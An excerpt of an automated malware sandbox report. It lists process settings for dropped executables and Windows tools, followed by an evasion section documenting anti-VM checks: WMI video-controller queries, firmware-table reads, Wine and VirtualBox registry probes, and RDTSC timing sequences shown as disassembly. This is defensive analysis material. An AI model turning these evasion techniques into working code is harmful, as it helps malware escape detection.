                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Found API chain indicative of sandbox detection
                                    Source: C:\Users\user\Desktop\random.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96105
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Query firmware table information (likely to detect VMs)
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSystem information queried: FirmwareTableInformation
                                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Tries to detect virtualization through RDTSC time measurements
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F7672 second address: 4F7678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F7678 second address: 4F767D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F767D second address: 4F7683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F7683 second address: 4F769C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0C52756h 0x00000008 js 00007F29F0C52756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jnp 00007F29F0C52756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50ABF0 second address: 50ABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50ABF8 second address: 50AC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52764h 0x0000000a jmp 00007F29F0C52765h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29F0C52756h 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50AC2E second address: 50AC5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29F0CD52A0h 0x00000011 push edi 0x00000012 jmp 00007F29F0CD529Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50E900 second address: 50E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C52766h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50E91A second address: 50E95F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F29F0CD5298h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D3A40h], eax 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1888h], ecx 0x00000037 push 796E8F02h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50E95F second address: 50E963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50E963 second address: 50E981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50E981 second address: 50EA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xor dword ptr [esp], 796E8F82h 0x0000000d add dword ptr [ebp+122D1A3Fh], esi 0x00000013 push 00000003h 0x00000015 and edi, dword ptr [ebp+122D2A9Bh] 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2ABBh] 0x00000023 jnl 00007F29F0C52772h 0x00000029 push 00000003h 0x0000002b mov si, ax 0x0000002e push DB92B47Ah 0x00000033 jmp 00007F29F0C52767h 0x00000038 xor dword ptr [esp], 1B92B47Ah 0x0000003f mov esi, 5ED73529h 0x00000044 lea ebx, dword ptr [ebp+1245F81Fh] 0x0000004a cmc 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EB03 second address: 50EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F29F0CD52AEh 0x00000015 jmp 00007F29F0CD52A8h 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EB30 second address: 50EB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C5275Dh 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EB41 second address: 50EB7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F29F0CD529Eh 0x00000016 jns 00007F29F0CD5298h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f jmp 00007F29F0CD529Dh 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 js 00007F29F0CD52A4h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EB7E second address: 50EB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EB82 second address: 50EBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, bh 0x00000009 push 00000003h 0x0000000b jmp 00007F29F0CD52A6h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1B8Ch], edx 0x00000018 push 00000003h 0x0000001a add dx, B6FEh 0x0000001f push 65F1E3FFh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50EBBD second address: 50EBC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50ED18 second address: 50ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50ED1E second address: 50EDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 4B430E72h 0x0000000d mov edx, dword ptr [ebp+122D3347h] 0x00000013 push 00000003h 0x00000015 sub edx, 55098AB1h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F29F0C52758h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D3A08h], ebx 0x0000003d push 00000003h 0x0000003f sub edi, 60689B98h 0x00000045 push AD70B887h 0x0000004a pushad 0x0000004b js 00007F29F0C52758h 0x00000051 jl 00007F29F0C5275Ch 0x00000057 popad 0x00000058 xor dword ptr [esp], 6D70B887h 0x0000005f mov ecx, dword ptr [ebp+122D2BD7h] 0x00000065 lea ebx, dword ptr [ebp+1245F833h] 0x0000006b jg 00007F29F0C5275Ah 0x00000071 mov cx, 7675h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F29F0C5275Fh 0x0000007d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 520009 second address: 52000D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52000D second address: 520013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 520013 second address: 52002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A3h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 506758 second address: 50676F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F29F0C52762h 0x0000000f jno 00007F29F0C52756h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
